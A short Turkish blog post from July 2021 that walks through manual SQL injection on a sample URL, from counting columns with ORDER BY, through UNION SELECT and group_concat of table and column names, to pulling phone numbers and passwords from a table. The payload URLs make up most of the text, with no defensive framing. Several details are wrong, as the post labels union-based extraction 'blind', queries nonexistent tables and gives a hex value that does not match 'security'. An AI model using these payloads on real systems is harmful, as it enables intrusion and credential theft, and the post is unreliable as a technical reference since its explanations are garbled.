27 Temmuz 2021 Salı

Kör Sql Injection (Blind)


 

Kör Sql Injection Nedir? (Blind)


1=0 1=2 4=3 gibi eşitlik olmayan değerler verildiğinde sitenin verdiği hata ya da sayfadaki değişmelere dayanarak işleme devam eder.

Örnek url www.test.com/test.php?id=1'and 1=2

Bu url 1=2 şeklinde bir eşitlik false olduğundan hata verecek ya da sayfadaki değişimler sonucunda bilği vercek verecektir.


Manuel Yapımı

Kolon Sayısı Tespiti


Kolon Sayısını Bulurken Sayfa Değişkliğini Kullanacağız. And "1=1" Order+By Order+By+1 Sondaki Sayıyı +1 Şeklinde Birer Birer(www.sechunterz.pw)Artırıyoruz Sayfa Değişinceye Kadar.Burada Kolon Sayısını Hangi Sayıda Sayfa Değiştiğinden Anlayacağız.

www.test.com/test.php?id=1+and+1=1+order+by+1


Sorgu Oluşturma


Burada 1=1 Eşitlik Yerine 1=0 Eşitsizliği Kullanacaz.1=0' sonra "union+select+0,1,2,3" Yazıyoruz.2 Numarayı Kullanacağız


www.test.com/test.php?id=1+and+1=0+union+select+0,1,2,3


Tablo Çekimi


Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz


www.test.com/test.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables


Tablo Veri Çekimi


Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak securityTablosunu Çekcem Ve Bunun Hex(www.sechunterz.pw)Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


www.test.com/test.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi


security Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.(www.sechunterz.pw)Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.


www.test.com/test.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+security


www.sechunterz.pw

0 comments:

Yorum Gönder